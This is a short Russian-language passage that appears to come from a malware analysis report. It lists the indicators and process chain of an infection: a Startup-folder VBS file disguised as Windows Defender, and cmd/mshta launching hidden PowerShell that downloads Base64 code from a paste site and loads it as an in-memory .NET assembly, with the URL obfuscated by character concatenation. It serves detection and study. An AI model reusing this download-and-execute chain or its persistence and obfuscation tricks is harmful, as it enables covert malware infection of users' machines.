Техническая информация
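- Файл в папке автозагрузки пользователя (выполняется при входе в систему; имя имитирует Windows Defender): %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs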
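- nul (по-видимому, не отдельный файл, а следствие перенаправления вывода «> nul» в команде cmd.exe, приведённой ниже)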
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...' (со скрытым окном)
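- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+...' (со скрытым окном) — PowerShell получает строку через Net.WebClient, декодирует её из Base64 и загружает результат как .NET-сборку в память ([Reflection.Assembly]::Load); адрес собран конкатенацией отдельных символов, вероятно, чтобы затруднить обнаружение по строке URL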
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object ...
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10 (в приведённой выше команде cmd.exe используется как задержка перед запуском mshta.exe)
- '<SYSTEM32>\mshta.exe' vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+...